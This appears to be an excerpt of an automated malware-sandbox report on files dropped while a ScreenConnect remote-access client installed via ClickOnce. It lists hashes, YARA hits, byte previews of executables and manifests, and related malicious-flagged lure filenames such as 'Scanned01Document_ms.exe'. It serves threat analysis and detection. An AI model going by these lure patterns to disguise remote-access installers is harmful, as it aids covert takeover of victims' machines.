                                                                                                                                                                                                                                                  SSDEEP:192:QWh4+9n9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoy5oFOR:QWx9qS6VTX9dX9R/QPIBM7Yy2Fq
                                                                                                                                                                                                                                                  MD5:97FEF1F16DFFBF51DE83D469D62E1D45
                                                                                                                                                                                                                                                  SHA1:491BB26CE0225525F92572E7DCFF3242DEFA170D
                                                                                                                                                                                                                                                  SHA-256:92B9689FEFD4C6864A9988E4A2C3B94CA1AB669CC3768AFDBD4C78040D7524E3
                                                                                                                                                                                                                                                  SHA-512:CFC74F4920BD86B431E84441B9764626B54E9751AAF7527421D588F84E48BCCC5A0271E77F748E050DD97B64683C39958C25A7AE83AD49684DFF169B97AB67F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH.........}%[..0$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om...{............-........................E..................................k...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4428
                                                                                                                                                                                                                                                  Entropy (8bit):4.37670169564968
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:tFQKXCD5v+tgLe6S+9ow87gFW75uv72qhxIdaxsgcm70ZikoDprOaJCf:tFvX4eV+Ww8U45uiqhdxhx04koNOrf
                                                                                                                                                                                                                                                  MD5:59A2612550ADAA55B5B27A9E3DDE1756
                                                                                                                                                                                                                                                  SHA1:BE3C0ECFC5380A5C76CE0C9500925B7CB047BDEE
                                                                                                                                                                                                                                                  SHA-256:71C9B79BBBFEA8431BCC4B0B447C0288D9AF7815517BFC544142F2D41D0712CD
                                                                                                                                                                                                                                                  SHA-512:E18F3F12983B2E29D832EF8B3E617DB8ADE6B6133329CFC3647C24AB87482C080D34C1614E6BDD08C3C3EEF8D9E2B44B27DBA80417DE5D5DE37D18998475CC54
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH.........l......,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...............................................k...............................................k...............................................k...............................................k...............................................k...............................................k...nameScreenConnect.Cl
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                  Entropy (8bit):4.9739376290794715
                                                                                                                                                                                                                                                  Encrypted:false
